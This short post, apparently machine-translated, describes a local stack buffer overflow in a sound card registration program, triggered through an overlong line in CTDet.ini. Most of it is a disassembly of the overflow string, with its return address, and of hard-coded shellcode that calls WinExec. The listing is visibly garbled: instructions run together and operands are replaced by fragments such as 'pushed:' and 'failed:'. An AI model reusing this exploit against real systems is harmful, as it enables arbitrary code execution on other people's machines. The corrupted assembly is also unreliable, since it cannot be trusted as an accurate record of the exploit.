Innovative sound card registration program local Stack Overflow
In CTDet. ini, the first line of the last section contains 962 characters, and the last three words point to the space on the stack.
000001BF: 3D 48454C4C cmp eax, pushed: 4F DEC EDI000001C5: 54 PUSH ESP000001C6: 48 DEC pushed: 45 INC pushed: 52 PUSH EDX000001C9: 45 INC pushed: 3D 3D464646 cmp eax, pushed: 47 INC EDI000001D0: 47 INC EDI000001D1: 47 INC EDI000001D2: 41 INC ECX000001D3: 07 pop es;-JUNK000001D4: 08 ??? 000001D5: aa stos byte ptr es: [EDI] 000001D6: 1800 SBB [EAX], AL; RET ADDR
Use a hard-coded WinExec demo
00000160: 31C0 xor eax, pushed: 90 NOP00000163: 90 NOP00000164: 50 PUSH pushed: B8 434C4143 mov eax, pushed: 50 PUSH failed: 89E0 mov eax, ESP0000016D: 31DB xor ebx, pushed: 83C3 01 add ebx, 100000172: 53 PUSH EBX00000173: 50 PUSH failed: 90 pushed: 90 pushed: 90 pushed: 90 NOP00000178: 90 NOP00000179: 90 NOP0000017A: E8 92850D76 CALL 760D8711